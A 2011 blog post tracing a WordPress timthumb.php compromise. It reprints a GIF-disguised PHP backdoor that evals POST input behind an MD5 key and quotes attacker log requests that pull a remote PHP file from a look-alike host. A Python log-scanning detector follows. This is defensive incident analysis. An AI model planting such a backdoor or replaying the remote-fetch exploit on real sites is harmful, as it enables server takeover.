
Wordpress timthumb hack - a short story
Wednesday - Nov 9th 2011 - by - (0 comments)

And the cat and mouse game goes on and on...
As I already wrote in another post 'On a hacker's trail', it's always the same story: Admin (tries) to secure system as much as possible, hackers (might) come in, admin finds hacker and fixes vulnerability, hackers (might) find other vulnerabilities.... and so on. At least it keeps me busy ;-).

This time I stumbled over a Wordpress hack which has been known since August 2011 (I found that out after some research). The first hint was an unusually large number of POST entries in the access log of a virtual host. So I checked which files had been created through the web server (i.e. owned by the Apache uid):

# for file in $(find . -user www-data | grep .php)
> do
> ls -l "$file"
> done
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-admin/upd.php
-rw-r--r-- 1 www-data www-data 4 2011-08-05 17:45 ./critics/wp-content/themes/InReview/cache/external_9cb702aa084691e66c789c1e98d6233a.php
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-content/upd.php
-rw-r--r-- 1 www-data www-data 1.6K 2011-08-21 19:39 ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
-rw-r--r-- 1 www-data www-data 887 2011-10-07 20:04 ./photo/wp-content/themes/DeepFocus/cache/a31844cea72ed6c9f90b56b039bbf3f5.php
-rw-r--r-- 1 www-data www-data 15K 2011-07-20 10:59 ./photo/wp-content/w3-total-cache-config.php

There were some more files but I left out session files.

After taking a closer look at some of the files, I came across external_ed59d62e1b1e2167275feed65b374079.php, which had interesting content:

# more ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
GIF89a4+3f3333f333ff3fffff3...
[... about 1.5 KB of binary GIF data, unreadable in the terminal ...]
<?php
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
?>

The file starts with binary data, as if it were trying to 'hide' as a non-text file. grep therefore treats it as a binary file and only reports that it matches instead of printing the matching line:

# grep -r "eval (stripslashes" *
Binary file photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php matches

But even more interesting is what happens after the binary part. The PHP code expects a 'key' parameter via POST. If the MD5 hash of the submitted 'key' matches the hard-coded value, the content of a second POST parameter, 'code' (assigned to $cmd), is passed to eval() and executed on the system.

OK, so far I knew that this file doesn't belong to Wordpress and that it's dangerous. But how did it get onto the system?

Let's take a look in the Apache logs at what happened on August 21st at around 19:39, when the file was created/modified:

91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62"

91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62"

The hacker first tried thumb.php, but this file doesn't exist. On the second try he was successful with timthumb.php, a PHP script of the theme used to upload images, which is obviously vulnerable: the 'src' parameter points to a host (blogger.com.bloggera.net) that merely looks like blogger.com, and the fetched file ended up in the theme's cache directory as the PHP file found above.

So this is the source and this needs to be fixed.
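To find this vector in the access log without reading it by hand, here is an added example (not code from the original post): a small Python script that flags timthumb.php requests whose 'src' host is not an allowed domain or a real subdomain of one, so a look-alike such as blogger.com.bloggera.net is caught. The sample log lines and the allowed host list are constructed for this example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines, modelled on the access log excerpt in this post.
SAMPLE_LOG = """\
91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80"
91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80"
10.0.0.5 - - [21/Aug/2011:20:01:10 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 4021 "" "Mozilla/5.0"
10.0.0.6 - - [21/Aug/2011:20:02:00 +0200] "GET /photo/wp-content/uploads/2011/08/pic.jpg HTTP/1.1" 200 9000 "" "Mozilla/5.0"
"""

# Hosts the theme may legitimately fetch thumbnails from (assumed list for this example).
ALLOWED_HOSTS = ("blogger.com", "img.youtube.com", "wordpress.com")

# Combined-log-format prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def host_is_allowed(host, allowed=ALLOWED_HOSTS):
    """True only if host equals an allowed domain or is a real subdomain of it.
    A plain substring test would accept 'blogger.com.bloggera.net'; this does not."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def suspicious_timthumb_requests(log_text, allowed=ALLOWED_HOSTS):
    """Return (ip, timestamp, status, src_host) for every timthumb.php request
    whose src parameter points at a host outside the allowed list."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("path"))
        if not url.path.endswith("/timthumb.php"):
            continue
        src = parse_qs(url.query).get("src", [""])[0]
        src_host = urlparse(src).hostname or ""
        if src_host and not host_is_allowed(src_host, allowed):
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), src_host))
    return hits


if __name__ == "__main__":
    for hit in suspicious_timthumb_requests(SAMPLE_LOG):
        print("suspicious timthumb fetch:", hit)
```

A status of 200 on a flagged request means the remote file was actually fetched and cached, which is exactly when the theme's cache directory should be inspected.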

This hack was first discovered by Mark Maunder on August 1st 2011, and he explains in a very good article how timthumb.php could be abused (very easy in fact!):
http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

Another good article can be found on the following page: http://pinchii.com/home/2011/08/hack-attempt-on-pinchii-com
